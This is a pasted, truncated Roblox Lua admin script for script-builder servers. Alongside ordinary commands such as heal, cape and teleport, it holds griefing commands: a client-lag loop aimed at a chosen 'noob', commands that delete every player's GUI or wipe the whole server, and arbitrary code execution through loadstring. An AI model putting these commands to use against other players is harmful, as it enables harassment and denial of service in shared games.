Advertisement
Demonlord27

somerandomfoundadmin

Jan 28th, 2017
187
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 163.30 KB | None | 0 0
  1. --[From The Shark Gang Script Bank]---------------------------------------------------------------------------------
  2. --
  3. version='0.51'
  4. Mode='Agression'
  5. lego=nil
  6. X=function(f)coroutine.resume(coroutine.create(f))end
  7. if script~=nil then
  8. for i,v in pairs(script:children())do
  9. if v.Name=='y'and v:IsA('StringValue')then
  10. X(function()wait'';loadstring(script:FindFirstChild('y').Value)()end)
  11. return nil
  12. end
  13. end
  14. end
  15.  
  16. pcall(function()
  17. if game.PlaceId~=0 then
  18. script.Parent=Alakazard
  19. end
  20. script.Name=[[Alakazard's Admin Script]]
  21. end)
  22.  
  23. pcall(function()game:service('Debris'):AddItem(game:FindFirstChild('ControlFrame',true),0)end)
  24.  
  25. PlayersList={
  26.  
  27. Creator={
  28.  
  29. yfc,
  30.  
  31.  
  32. },
  33.  
  34. Annoying={},
  35.  
  36. PlayerIP={},
  37.  
  38. KOs={},
  39.  
  40. RunCharacterFunctions={},
  41.  
  42. Runs={
  43.  
  44. HealthBar={},
  45.  
  46. History={},
  47.  
  48. },
  49.  
  50. Guis={}
  51.  
  52. }
  53.  
  54. Datas={
  55.  
  56. R={S=false,},
  57.  
  58. }
  59.  
  60. se={
  61.  
  62. lighting=game:GetService('Lighting'),
  63.  
  64. starterpack=game:GetService('StarterPack'),
  65.  
  66. startergui=game:GetService('StarterGui'),
  67.  
  68. players=game:GetService('Players'),
  69.  
  70. workspace=game:service('Workspace'),
  71.  
  72. debris=game:service('Debris'),
  73.  
  74. insert=game:service('InsertService'),
  75.  
  76. sc=game:service('ScriptContext'),
  77.  
  78. }
  79. Q={}
  80.  
  81.  
  82. id='rbxassetid://'
  83. baseid='http://www.roblox.com/asset/?id='
  84. --===============Changes===============--
  85. new= Instance.new;
  86. unew= UDim2.new;
  87. vnew= Vector3.new;
  88. fnew= CFrame.new;
  89. cnew= Color3.new;
  90. bcn= BrickColor.new;
  91. look= CFrame.lookVector;
  92. rot= CFrame.fromEulerAnglesXYZ;
  93. --=====================================--
  94.  
  95. life=function(obj,time)
  96. se.debris:AddItem(obj,time)
  97. end
  98.  
  99.  
  100. --======================Times======================--
  101. StartTime= tick();
  102.  
  103. time=function()
  104. ttime=se.workspace.DistributedGameTime
  105. ttime='-'..ttime
  106. for i in string.gmatch(ttime,'%w+')do
  107. ttime=i break
  108. end
  109. return ttime
  110. end
  111. --=================================================--
  112.  
  113. Backpack=function(p)
  114. for i,e in pairs(p:children())do
  115. if e:IsA('Backpack')then
  116. return e
  117. end
  118. end
  119. bp=new('Backpack',p)
  120. return bp
  121. end
  122. PlayerGui=function(p)
  123. for i,e in pairs(p:children())do
  124. if e:IsA('PlayerGui')then
  125. return e
  126. end
  127. end
  128. return nil
  129. end
  130. StarterGear=function(p)
  131. for i,e in pairs(p:children())do
  132. if e:IsA('StarterGear')then
  133. return e
  134. end
  135. end
  136. bp=new('StarterGear',p)
  137. return bp
  138. end
  139.  
  140. ListCheck=function(ln,un)
  141. for i,w in pairs(ln)do
  142. if w==un then
  143. return true
  144. end
  145. end
  146. return false
  147. end
  148.  
  149. Print=function(text)
  150. fakehint=nil
  151. X(function()
  152. fakehint=new('ScreenGui')
  153. life(fakehint,10)
  154. fakehint.Name='Hint~'
  155. gui=new('TextLabel',fakehint)
  156. gui.Text=text..' [ Time: '..time()..' ]'
  157. gui.TextColor3=cnew(1,1,1)
  158. gui.BorderColor3=cnew(0,0,0)
  159. gui.Size=unew(1,0,0,20)
  160. gui.BackgroundTransparency=.5
  161. gui.BorderSizePixel=0
  162. gui.BackgroundColor3=cnew(0,0,0)
  163. gui.FontSize=('Size11')
  164. for i,v in ipairs(se.players:GetPlayers())do
  165. if ListCheck(PlayersList.Admins,v.userId)==true then
  166. if PlayersList.Runs.History[v.Name]==true then
  167. for b,s in pairs(v:children())do
  168. if s:IsA('PlayerGui')then
  169. localhints=0
  170. for l,k in pairs(s:children())do
  171. if k.className=='Hint'then
  172. k:remove()
  173. end
  174. if k.Name=='Hint~'then
  175. localhints=localhints+1
  176. end
  177. end
  178. gui.Position=unew(0,0,0,20*localhints)
  179. Scripting('local','localhints='..localhints..' for n=1,20 do script.Parent.Position=UDim2.new(0,0,0,localhints*n)wait()end',gui)
  180. fakehint.Parent=s
  181. end
  182. end
  183. end
  184. end
  185. end
  186. end)
  187. return fakehint
  188. end
  189.  
  190. localscript=game:service('InsertService'):LoadAsset(53987736)
  191. delay(.4,function()
  192. localscript=localscript.LocalScript:clone()
  193. localscript.Parent=nil
  194. new('StringValue',localscript).Name='y'
  195. end)
  196. wait(.5)
  197.  
  198. Print('Waiting for Localscript')
  199.  
  200. Scripting=function(class,a,p)--Rofl
  201. scrc=nil
  202. if a==''then return end
  203. if Datas.R.S==false then
  204. se.sc.ScriptsDisabled=false
  205. end
  206. X(function()
  207. if class=='local'then
  208. if script==nil then
  209. scr=new('LocalScript')
  210. scr.Source=a
  211. scrc=scr:clone()
  212. scrc.Parent=p
  213. scrc.Disabled=false
  214. else
  215. if localscript~=nil then
  216. scr=localscript:clone()
  217. scr.y.Value=a
  218. scrc=scr:clone()
  219. scrc.Parent=p
  220. scrc.Disabled=false
  221. else
  222. Scripting('script',a,p)
  223. end
  224. end
  225. end
  226. if class=='script'then
  227. if script~=nil then
  228. if game.CreatorId~=9201 then
  229. scr=script:clone()
  230. scr.Name='ALAKAZARD_NEW_SCRIPT'
  231. new('StringValue',scr).Name='y'
  232. scr.y.Value=a
  233. scrc=scr:clone()
  234. scrc.Parent=p
  235. elseif game.CreatorId==9201 then
  236. if anscr==nil then
  237. scr=game:GetService('InsertService'):LoadAsset(53745810)
  238. if #scr:GetChildren()~=0 then
  239. anscr=scr.sb:clone()
  240. elseif #scr:GetChildren()==0 then
  241. if script~=nil then
  242. scr=script:clone()
  243. scr.Name='ALAKAZARD_NEW_SCRIPT'
  244. new('StringValue',scr).Name='y'
  245. scr.y.Value=a
  246. scrc=scr:clone()
  247. scrc.Parent=p
  248. else
  249. scr=new('Script')
  250. scr.Name='ALAKAZARD_NEW_SCRIPT'
  251. scr.Source=a
  252. scrc=scr:clone()
  253. scrc.Parent=p
  254. end
  255. end
  256. end
  257. for i,v in pairs(anscr:GetChildren())do
  258. if v.className=='StringValue'then
  259. v.Value=a
  260. end
  261. end
  262. scrc=anscr:clone()
  263. scrc.Parent=p
  264. end
  265. elseif script==nil then
  266. scr=new('Script')
  267. scr.Name='ALAKAZARD_NEW_SCRIPT'
  268. scr.Source=a
  269. scrc=scr:clone()
  270. scrc.Parent=p
  271. end
  272. end
  273. end)
  274. return scrc
  275. end
  276.  
  277. Print([[Load Alakazard's Admin Script!]])
  278.  
  279. time()
  280.  
  281. clen=0
  282.  
  283. _G.LS_={
  284. [1]=baseid..'53089014',
  285. [2]=baseid..'53089019',
  286. [3]=baseid..'53089022',
  287. [4]=baseid..'53089026',
  288. [5]=baseid..'53089031',
  289. [6]=baseid..'53089039',
  290. [7]=baseid..'53089046',
  291. [8]=baseid..'53089043',
  292. [9]=baseid..'53089054',
  293. [10]=baseid..'53089068',
  294. [11]=baseid..'53100317',
  295. }
  296.  
  297. SomethingFunctions={}
  298.  
  299. GlobalScripts={}
  300.  
  301. Actual={}
  302.  
  303. AlakazardCmds={
  304.  
  305. Functions={},
  306.  
  307. NewFunctions={},
  308.  
  309. Objects={},
  310.  
  311. Names={},
  312.  
  313. }
  314.  
  315. Hats={
  316.  
  317. AlakazardHats={},
  318.  
  319. NEMESZISZHats={},
  320.  
  321. }
  322.  
  323. Guis={
  324.  
  325. HealthBar={},
  326.  
  327. Hint={},
  328.  
  329. Commands={},
  330.  
  331. }
  332.  
  333. Sounds={
  334.  
  335. pax={SoundId='rbxassetid://52155103',Pitch=1,Volume=1,Looped=true},
  336.  
  337. warning={SoundId='rbxassetid://50909479',Pitch=.5,Volume=1,Looped=false},
  338.  
  339. laugh={SoundId='rbxassetid://50251793',Pitch=.3,Volume=1,Looped=false},
  340.  
  341. punch={SoundId='rbxassetid://54612598',Pitch=1,Volume=1,Looped=flase},
  342.  
  343. start={SoundId='rbxassetid://53999348',Pitch=.6,Volume=1,Looped=false}
  344.  
  345. }
  346.  
  347. Commands={
  348.  
  349. ['cmds/ "Commands..."']=function(v,s)
  350. if scmd(v,'cmds')==false then return end
  351. X(function()
  352. if s:FindFirstChild([[Alakazard's Base Cmds]],true) then return end
  353. for i,t in pairs(Commands)do
  354. if s:FindFirstChild('PlayerGui')then
  355. se.debris:AddItem(Adv(i,s.PlayerGui),#i/10)
  356. wait(#i/10)
  357. end
  358. end
  359. end)
  360. end,
  361.  
  362. ['load/ >script source here<']=function(v,s)
  363. if scmd(v,'load')==false then return end
  364. Source=string.sub(v,clen+1)
  365. X(function()loadstring(Source)()end)
  366. end,
  367.  
  368. ['scr/ >script source here<']=function(v,s)
  369. if scmd(v,'scr')==false then return end
  370. table.insert(GlobalScripts,Scripting('script',string.sub(v,clen+1),se.workspace))
  371. end,
  372.  
  373. ['historyshow/ "ah, I am lazy to write what this command mean... :P"']=function(v,s)
  374. if scmd(v,'historyshow')then return end
  375. PlayersList.Runs.History[s.Name]=true
  376. end,
  377.  
  378. ['historyhide/ "ah, I am lazy to write what this command mean... :P"']=function(v,s)
  379. if scmd(v,'historyhide')then return end
  380. PlayersList.Runs.History[s.Name]=false
  381. end,
  382.  
  383. ['scrl/ >script source here<']=function(v,s)
  384. if scmd(v,'scrl')==false then return end
  385. for i,pg in pairs(s:children())do
  386. if pg.className=='PlayerGui'then
  387. X(function()
  388. table.insert(GlobalScripts,Scripting('local',string.sub(v,clen+1),pg))
  389. end)
  390. end
  391. end
  392. end,
  393.  
  394. ['respawn/user "Respawn."']=function(v,s)
  395. if scmd(v,'respawn')==false then return end
  396. X(function()
  397. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  398. if script==nil then s:LoadCharacter()return end
  399. m=new('Model',se.workspace)
  400. new('Humanoid',m)
  401. pl.Character=m
  402. end
  403. end)
  404. end,
  405.  
  406. ['disabled/ "newscripts will disabled..."']=function(v,s)
  407. if scmd(v,'disabled')==false then return end
  408. X(function()
  409. Datas.R.S=true
  410. se.sc.ScriptsDisabled=true
  411. end)
  412. end,
  413.  
  414. ['enabled/ "newscripts will undisabled..."']=function(v,s)
  415. if scmd(v,'enabled')==false then return end
  416. X(function()
  417. Datas.R.S=false
  418. se.sc.ScriptsDisabled=false
  419. end)
  420. end,
  421.  
  422. ['lol/ "lol"']=function(v,s)
  423. for i in v:lower():gmatch('%w+')do
  424. if i=='lol'then
  425. newsound=new('Sound')
  426. life(newsound,1)
  427. newsound.Name='lol'
  428. newsound.SoundId=Sounds['laugh'].SoundId
  429. newsound.Pitch=.5
  430. newsound.Volume=1
  431. pcall(function()newsound.Parent=s.Character.Head end)
  432. newsound:play()
  433. break
  434. end
  435. end
  436. end,
  437.  
  438. ['unshield/user']=function(v,s)
  439. if scmd(v,'unshield')==false then return end
  440. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  441. X(function()
  442. for b,w in pairs(pl.Character:children())do
  443. if w.Name=='Shield'then
  444. w:remove()
  445. end
  446. end
  447. end)
  448. end
  449. end,
  450.  
  451. ['talk/ "This is work if admin not in BaseScripts"']=function(v,s)
  452. if scmd(v,'talk')==false then return end
  453. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  454. if pcall(function()pl:SetSuperSafeChat(false)end)then
  455. else
  456. Print(s.Name..' Use illegal command')
  457. end
  458. end
  459. end,
  460. ['killguis/ "You will see"']=function(v,s)
  461. if scmd(v,'killguis')==false then return end
  462. for i,pl in ipairs(game:service('Players'):GetPlayers())do
  463. Scripting('local',[[
  464. game:service('Debris'):AddItem(game:FindFirstChild('RobloxGui',true),1)
  465. ]],PlayerGui(pl))wait()
  466. end
  467. end,
  468. ['erh/noob "Lagg for noob"']=function(v,s)
  469. if scmd(v,'erh')==false then return end
  470. for i,pl in pairs(spl(v:sub(clen+1),s))do
  471. Scripting('local',[[
  472. image={53646388,53646377,53645929,53645378,48290678,48260066,48328309,48293007,49316256,48258623,43082279,47595647,47596170,47944712}
  473. num=0
  474. while true do num=num+1
  475. if num==50 then
  476. num=0
  477. wait()
  478. end
  479. for a=0,9 do
  480. for i=0,9 do
  481. screen=Instance.new('ScreenGui',game.CoreGui)
  482. gui=Instance.new('ImageButton',screen)
  483. gui.Image='http://www.roblox.com/asset/?id='..image[math.random(1,#image)]
  484. gui.Size=UDim2.new(.1,0,.1,0)
  485. gui.BackgroundTransparency=1
  486. gui.Position=UDim2.new(i/10,0,a/10,0)
  487. end
  488. end
  489. end
  490. ]],PlayerGui(pl))
  491. end
  492. end,
  493. ['shutup/ "Work if admin not run in BaseScrips"']=function(v,s)
  494. if scmd(v,'shutup')==false then return end
  495. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  496. if pcall(function()pl:SetSuperSafeChat(true)end)then
  497. else
  498. Print(s.Name..'Use illegal command')
  499. end
  500. end
  501. end,
  502.  
  503. ['shield/user']=function(v,s)
  504. if scmd(v,'shield')==false then return end
  505. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  506. X(function()pl.Character.Shield:remove()end)
  507. X(function()
  508. shield=new('Part')
  509. shield.Transparency=.5
  510. shield.Shape=0
  511. shield.TopSurface=0
  512. shield.BottomSurface=0
  513. shield.Size=vnew(10,10,10)
  514. shield.BrickColor=bcn(1003)
  515. shield.CanCollide=false
  516. shield.CFrame=pl.Character.Torso.CFrame
  517. bp=new('BodyPosition',shield)
  518. bp.position=shield.Position
  519. bp.P=20000
  520. bp.maxForce=vnew(9999999999999,9999999999999,9999999999999)
  521. X(function()
  522. Scripting('local',[[wait(1)
  523. p=script.Parent.Parent
  524. script.Parent=p.Character.Shield
  525. script.Parent.Touched:connect(function(a)
  526. if a.Parent~=script.Parent.Parent and not a.Parent:IsA('Hat')then
  527. a:breakJoints()
  528. end
  529. end)
  530. while true do
  531. wait()
  532. script.Parent.BodyPosition.position=script.Parent.Parent.Torso.Position
  533. end
  534. ]],s.PlayerGui)
  535. end)
  536. shield.Name='Shield'
  537. shield.Parent=pl.Character
  538. --[[ rp=new('RocketPropulsion',shield)
  539. rp.MaxSpeed=200
  540. rp.MaxThrust=90000
  541. rp.ThrustD=50
  542. rp.ThrustP=800
  543. rp.Target=pl.Character.Torso
  544. rp.MaxTorque=vnew(10000,10000,10000)
  545. rp.TurnD=500
  546. rp.TurnP=0]]
  547. end)
  548. end
  549. end,
  550.  
  551. ['die/user "user will die"']=function(v,s)
  552. if scmd(v,'die')==false then return end
  553. X(function()
  554. for i,pl in pairs(spl(string.sub(v,clen+1),s))do
  555. KO_CREATOR(s,pl)
  556. end
  557. end)
  558. end,
  559.  
  560. ['base/ "New map just a big part."']=function(v,s)
  561. if scmd(v,'base')==false then return end
  562. X(function()
  563. p=new('Part')
  564. p.Size=vnew(1000,3,1000)
  565. p.Anchored=true
  566. p.Name='Base'
  567. p.BrickColor=bcn(37)
  568. p.formFactor=3
  569. p.Locked=true
  570. spawn=new('SpawnLocation',p)
  571. spawn.Size=vnew(4,1,4)
  572. spawn.Transparency=1
  573. spawn.CanCollide=false
  574. spawn.Anchored=true
  575. spawn.Locked=true
  576. spawn.Duration=0
  577. p.Parent=se.workspace
  578. for i,o in pairs(se.workspace:GetChildren())do
  579. if not game.Players:GetPlayerFromCharacter(o) and o~=script and o~=p then
  580. o.archivable=false
  581. se.debris:AddItem(o,.1)
  582. end
  583. end
  584. end)
  585. end,
  586.  
  587. ['shutdown/ "Server ended."']=function(v,s)
  588. if scmd(v,'shutdown')==false then return end
  589. for i,pl in ipairs(game:service('Players'):GetPlayers())do
  590. Scripting('local',[[
  591. game:service('Debris'):AddItem(game:FindFirstChild('RobloxGui',true),1)
  592. remove=function(o)
  593. pcall(function()
  594. for i,v in pairs(o:children())do
  595. pcall(function()game:service('Debris'):AddItem(v,1)end)
  596. pcall(function()remove(v)end)
  597. end
  598. end)
  599. end
  600. remove(game)
  601. ]],PlayerGui(pl))wait()
  602. end
  603. wait(2.5)
  604. pcall(function()game:Shutdown()end)
  605. Clear(game,'all')
  606. X(function()new('ManualSurfaceJointInstance')end)
  607. end,
  608.  
  609. ['nchar/user "Character not found."']=function(v,s)
  610. if scmd(v,'nchar')==false then return end
  611. for i,pl in pairs(spl(v:sub(clen+1),s))do
  612. pl.Character=nil
  613. end
  614. end,
  615.  
  616. ['lama/user "DERP!"']=function(v,s)
  617. if scmd(v,'lama')==false then return end
  618. X(function()
  619. for i,pl in pairs(spl(v:sub(clen+1),s))do
  620. for pn,pg in pairs(pl:GetChildren())do
  621. if pg.className=='PlayerGui'then
  622. screen=new('ScreenGui',pg)
  623. se.debris:AddItem(screen,11)
  624. imagegui=new('ImageLabel',screen)
  625. imagegui.Name='i'
  626. imagegui.BackgroundTransparency=1
  627. imagegui.Position=unew(.4,0,.2,0)
  628. imagegui.Size=unew(0,200,0,300)
  629. screen.Name='Lama'
  630. Scripting('script',[[
  631. for ia=1,33 do
  632. for w,img in pairs(_G.LS_)do
  633. wait(.1)
  634. script.Parent.i.Image=img
  635. end
  636. end
  637. ]],screen)
  638. end
  639. end
  640. end
  641. end)
  642. end,
  643.  
  644. ['kick/user You can^t kicked admins!']=function(v,s)
  645. if scmd(v,'kick')==false then return end
  646. X(function()
  647. for i,pl in pairs(spl(v:sub(clen+1),s))do
  648. if ListCheck(PlayersList.Admins,pl.userId)==false then
  649. se.debris:AddItem(pl,1)
  650. for pn,pg in pairs(pl:GetChildren())do
  651. if pg.className=='PlayerGui'then
  652. pcall(Adv('Bye bye noob',pg,0,0,.5,0))
  653. wait()
  654. end
  655. end
  656. end
  657. end
  658. end)
  659. end,
  660.  
  661. ['ban/user You can^t banned admins!']=function(v,s)
  662. if scmd(v,'ban')==false then return end
  663. X(function()
  664. for i,pl in pairs(spl(v:sub(clen+1),s))do
  665. if ListCheck(PlayersList.Admins,pl.userId)==false then
  666. se.debris:AddItem(pl,1)
  667. table.insert(PlayersList.Annoying,pl.Name)
  668. for pn,pg in pairs(pl:GetChildren())do
  669. if pg.className=='PlayerGui'then
  670. pcall(Adv('Bye bye noob',pg,0,0,.5,0))
  671. wait()
  672. end
  673. end
  674. end
  675. end
  676. end)
  677. end,
  678.  
  679. ['heal/user "You know this mean."']=function(v,s)
  680. if scmd(v,'heal')==false then return end
  681. for i,pl in pairs(spl(v:sub(clen+1),s))do
  682. if pl.Character~=nil then
  683. for asdasd,hum in pairs(pl.Character:GetChildren())do
  684. if hum.className=='Humanoid'then
  685. hum.Health=hum.MaxHealth
  686. end
  687. end
  688. end
  689. end
  690. end,
  691.  
  692. ['replace/ "Remove all stuff in game"']=function(v,s)
  693. if scmd(v,'replace')==false then return end
  694. delay(0,function()
  695. BasePart=new('Part')
  696. BasePart.Size=vnew(1000,1,1000)
  697. BasePart.Anchored=true
  698. BasePart.BrickColor=BrickColor.random()
  699. BasePart.Name='Base'
  700. BasePart.Parent=workspace
  701. replace=function(o)
  702. for i,v in pairs(o:children())do
  703. pcall(function()replace(v)end)
  704. if v.className~='Player'and v~=script and v~=BasePart and v~=m_ and v.className~='PlayerMouse'then
  705. pcall(function()v.Health=0 v.MaxHealth=0 v:BreakJoints()end)
  706. pcall(function()v.Disabled=true end)
  707. pcall(function()v.archivable=false end)
  708. pcall(function()v:remove()end)
  709. end
  710. end
  711. end
  712. replace(game)
  713. for i,pl in pairs(spl('all',s))do
  714. if script==nil then s:LoadCharacter()return end
  715. m=new('Model',se.workspace)
  716. new('Humanoid',m)
  717. pl.Character=m
  718. end
  719. se.lighting.GeographicLatitude=41.73
  720. se.lighting.TimeOfDay=14
  721. se.lighting.ShadowColor=cnew(.701961,.701961,.721569)
  722. se.lighting.ColorShift_Top=cnew(0,0,0)
  723. se.lighting.ColorShift_Bottom=cnew(0,0,0)
  724. se.Ambient=cnew(.501961,.501961,.501961)
  725. se.Brightness=1
  726. end)
  727. end,
  728.  
  729. ['staff/user "This is make Alakazard'..'\39'..'s staff for user"']=function(v,s)
  730. if scmd(v,'staff')==false then return end
  731. for i,pl in pairs(spl(v:sub(clen+1),s))do
  732. Staff(Backpack(pl))
  733. end
  734. end,
  735.  
  736. ['flybin/ "This is make my fly hopperbin. -Alakazard"']=function(v,s)
  737. if scmd(v,'flybin')==false then return end
  738. for i,pl in pairs(spl(v:sub(clen+1),s))do
  739. FlyBin(Backpack(pl))
  740. end
  741. end,
  742.  
  743. ['inf/user "User have inf health"']=function(v,s)
  744. if scmd(v,'inf')==false then return end
  745. for i,pl in pairs(spl(v:sub(clen+1),s))do
  746. if pl.Character~=nil then
  747. for i,h in pairs(pl.Character:children())do
  748. if h:IsA('Humanoid')then
  749. for b,n in pairs(h:children())do
  750. if n.Name=='inf'then
  751. n:remove()
  752. end
  753. end
  754. end
  755. end
  756. for a,w in pairs(pl:children())do
  757. if w:IsA('PlayerGui')then
  758. Scripting('local',[[script.Name='inf'
  759. for i,v in pairs(script.Parent.Parent.Character:children())do
  760. if v:IsA('Humanoid')then
  761. script.Parent=v
  762. end
  763. end
  764. if script.Parent:IsA('Humanoid')then
  765. print'Humanoid found!'
  766. else
  767. script:remove()
  768. end
  769. script.Parent.Name='Ä |:| Alanoid |:| Ä'
  770. script.Parent.MaxHealth=1000
  771. script.Parent.Health=1000
  772. script.Parent.HealthChanged:connect(function()
  773. script.Parent.MaxHealth=1000
  774. script.Parent.Health=1000
  775. script.Parent.Torso.Parent:MakeJoints()
  776. end)]],w)
  777. end
  778. end
  779. end
  780. end
  781. end,
  782.  
  783. ['csb/ "Removed all admin script. asd"']=function(v,s)
  784. if scmd(v,'csb')==false then return end
  785. for i,s in pairs(GlobalScripts)do
  786. s.archivable=false
  787. s:remove()
  788. end
  789. end,
  790.  
  791. ['admin/user "Commands work for user."']=function(v,s)wait()
  792. if scmd(v,'admin')==false then return end
  793. for i,pl in pairs(spl(v:sub(clen+1),s))do
  794. if ListCheck(PlayersList.Admins,pl.userId)==false then
  795. table.insert(PlayersList.Admins,pl.userId)
  796. PlayerFunctionsConnect(pl)
  797. Print('New admin '..pl.Name..'!')
  798. end
  799. end
  800. end,
  801.  
  802. ['adv/test "Hint"']=function(v,s)
  803. if scmd(v,'adv')==false then return end
  804. for i,pl in pairs(spl('all',s))do
  805. for a,pgi in pairs(pl:GetChildren())do
  806. if pgi.className=='PlayerGui'then
  807. Adv(v:sub(clen+1),pgi,0,0,0,0)
  808. end
  809. end
  810. end
  811. end,
  812.  
  813. ['frz/user "Freeze user character."']=function(v,s)
  814. if scmd(v,'frz')==false then return end
  815. for i,pl in pairs(spl(v:sub(clen+1),s))do
  816. if pl.Character~=nil then
  817. for c,part in pairs(pl.Character:GetChildren())do
  818. if part.className=='Part'then
  819. part.Anchored=true
  820. end
  821. end
  822. end
  823. end
  824. end,
  825.  
  826. ['cape/user "Cape on yourh torso =3"']=function(v,s)
  827. if scmd(v,'cape')==false then return end
  828. for i,pl in pairs(spl(v:sub(clen+1),s))do
  829. if pl.Character~=nil then
  830. for ti,hum in pairs(pl.Character:GetChildren())do
  831. if hum.className=='Humanoid'then
  832. if hum.Torso~=nil then
  833. for iao,humt in pairs(hum.Torso:GetChildren())do
  834. if humt.Name=='Cape'then
  835. humt:remove()
  836. end
  837. end
  838. cpart=new('Part')
  839. cpart.CanCollide=false
  840. cpart.Name='Cape'
  841. cpart.BrickColor=bcn(1003)
  842. cpart.formFactor=3
  843. cpart.Size=vnew(.3,4,3)
  844. cpart.TopSurface=('Smooth')
  845. cpart.BottomSurface=('Smooth')
  846. cpart.Parent=hum.Torso
  847. cweld=new('Motor')
  848. cweld.Parent=hum.Torso
  849. cweld.Name='cCape'
  850. cweld.Part0=hum.Torso
  851. cweld.Part1=cpart
  852. cweld.C0=rot(0,1.57,0)+vnew(0,0,0)
  853. cweld.C1=fnew(.66,1,0)
  854. cweld.DesiredAngle=-.25
  855. cweld.MaxVelocity=.2
  856. Scripting('script',[[hum=script.Parent
  857. cweld=hum.Torso.cCape
  858. cape=cweld.Part1
  859. d=function()
  860. cape.Parent=workspace
  861. cape.Anchored=true
  862. for i=1,10 do
  863. wait()
  864. cape.Transparency=i/10
  865. end
  866. end
  867. hum.Died:connect(d)
  868. ]],hum)
  869. end
  870. end
  871. end
  872. end
  873. end
  874. end,
  875.  
  876. ['thw/user "Thaw user character."']=function(v,s)
  877. if scmd(v,'thw')==false then return end
  878. for i,pl in pairs(spl(v:sub(clen+1),s))do
  879. if pl.Character~=nil then
  880. for c,part in pairs(pl.Character:GetChildren())do
  881. if part.className=='Part'then
  882. part.Anchored=false
  883. end
  884. end
  885. end
  886. end
  887. end,
  888.  
  889. ['rhats/user "Thaw user character."']=function(v,s)
  890. if scmd(v,'rhats')==false then return end
  891. for i,pl in pairs(spl(v:sub(clen+1),s))do
  892. if pl.Character~=nil then
  893. for c,hat in pairs(pl.Character:GetChildren())do
  894. if hat.className=='Hat'then
  895. hat:remove()
  896. end
  897. end
  898. end
  899. end
  900. end,
  901.  
  902. ['tele/user/user2 "user(s) position == user2 position"']=function(v,s)
  903. if scmd(v,'tele')==false then return end
  904. Findw(v,'tele',2)
  905. for i,pl in pairs(spl(Q[1],s))do
  906. for a,ppll in pairs(spl(Q[2],s))do
  907. X(function()pl.Torso.CFrame=ppll.Torso.CFrame end)
  908. end
  909. end
  910. end,
  911.  
  912. ['unpunish/user "Character not in workspace, but you can put back. if you say unpunish/user"']=function(v,s)
  913. if scmd(v,'unpunish')==false then return end
  914. for i,pl in pairs(spl(v:sub(clen+1),s))do
  915. if pl.Character~=nil then
  916. char=pl.Character
  917. char.Parent=se.workspace
  918. char:MakeJoints()
  919. end
  920. end
  921. end,
  922.  
  923. ['punish/user "Character not in workspace, but you can put back. if you say unpunish/user"']=function(v,s)
  924. X(function()
  925. if scmd(v,'punish')==false then return end
  926. for i,pl in pairs(spl(v:sub(clen+1),s))do
  927. if pl.Character~=nil then
  928. pl.Character.Parent=nil
  929. end
  930. end
  931. end)
  932. end,
  933.  
  934. ['rtools/user "Removed user backpack."']=function(v,s)
  935. if scmd(v,'rtools')==false then return end
  936. for i,pl in pairs(spl(v:sub(clen+1),s))do
  937. for ia,plb in pairs(pl:GetChildren())do
  938. if plb.className=='Backpack'then
  939. plb:remove()
  940. Instance.new('Backpack',pl)
  941. end
  942. end
  943. end
  944. end,
  945.  
  946. ['dis/ "This disabled new scripts!"']=function(v,s)
  947. if scmd(v,'dis')==false then return end
  948. se.sc.ScriptsDisabled=true
  949. end,
  950.  
  951. ['ena/ "This enabled new scripts!"']=function(v,s)
  952. if scmd(v,'ena')==false then return end
  953. se.sc.ScriptsDisabled=false
  954. end,
  955.  
  956. ['instance/int "Anaminus SBs block command 0=dont block 1=block scripts"']=function(v,s)
  957. if scmd(v,'instance')==false then return end
  958. intn=v:sub(clen+1,clen+1):lower()
  959. if intn==nil or intn=='' then return end
  960. if intn=='x' then Instance.new=nil end
  961. if intn=='o' then Instance.new=new end
  962. end,
  963.  
  964. ['clear/ "this remove all script"']=function(v,s)
  965. if scmd(v,'clear')==false then return end
  966. Clear(game,'script')
  967. end,
  968.  
  969. ['ans/int "Anaminus SBs block command 0=dont block 1=block scripts"']=function(v,s)
  970. if scmd(v,'ans')==false then return end
  971. intn=v:sub(clen+1,clen+1)
  972. if intn==nil or intn=='' then return end
  973. if AnaSbCheck1~=nil then
  974. AnaSbCheck1:disconnect()AnaSbCheck1=nil
  975. end
  976. if intn==0 or intn=='0'then return end
  977. if intn==1 or intn=='1'then
  978. AnaSbCheck1=se.workspace.ChildAdded:connect(function(asd)
  979. for i,a in pairs(AnaminusBlock)do
  980. if asd~=nil then
  981. a(asd)
  982. end
  983. end
  984. end)
  985. end
  986. end,
  987.  
  988. ['hint/ "hint in screen"']=function(v,s)
  989. if scmd(v,'hint')==false then return end
  990. X(function()
  991. for i,pl in pairs(spl('all',s))do
  992. for a,pg in pairs(pl:GetChildren())do
  993. if pg.className=='PlayerGui'then
  994. _HM(v:sub(clen+1),'Hint',pg)
  995. end
  996. end
  997. end
  998. end)
  999. end,
  1000.  
  1001. ['cln/objectname']=function(v,s)
  1002. if scmd(v,'cln')==false then return end
  1003. X(function()AlakazardCmds.Names.clear=v:sub(clen+1)ChangeClear(game,'name')end)
  1004. end,
  1005.  
  1006. ['mess/ "message in screen"']=function(v,s)
  1007. if scmd(v,'mess')==false then return end
  1008. X(function()
  1009. for i,pl in pairs(spl('all',s))do
  1010. for a,pg in pairs(pl:GetChildren())do
  1011. if pg.className=='PlayerGui'then
  1012. _HM(v:sub(clen+1),'Message',pg)
  1013. end
  1014. end
  1015. end
  1016. end)
  1017. end,
  1018.  
  1019. ['kos/user "..."']=function(v,s)
  1020. if scmd(v,'kos')==false then return end
  1021. X(function()
  1022. for i,pl in pairs(spl(v:sub(clen+1),s))do
  1023. if ListCheck(PlayersList.Admins,pl.userId)==false then
  1024. KO(s,pl)
  1025. end
  1026. end
  1027. end)
  1028. end,
  1029.  
  1030. ['rguis/user "Removed user guis."']=function(v,s)
  1031. if scmd(v,'rguis')==false then return end
  1032. for i,pl in pairs(spl(v:sub(clen+1),s))do
  1033. for ia,plb in pairs(pl:GetChildren())do
  1034. if plb.className=='PlayerGui'then
  1035. for i,v in pairs(plb:children())do v:remove()end
  1036. Scripting('local',[[
  1037. lego=game:service('Debris')lego:AddItem(game:FindFirstChild('ControlFrame',true),0)
  1038. ]],PlayerGui(pl))
  1039. end
  1040. end
  1041. end
  1042. end,
  1043.  
  1044. }
  1045.  
  1046. _GCommands=function()
  1047. _G['Alakazard..'..'\39'..'s Admin Commands']={}
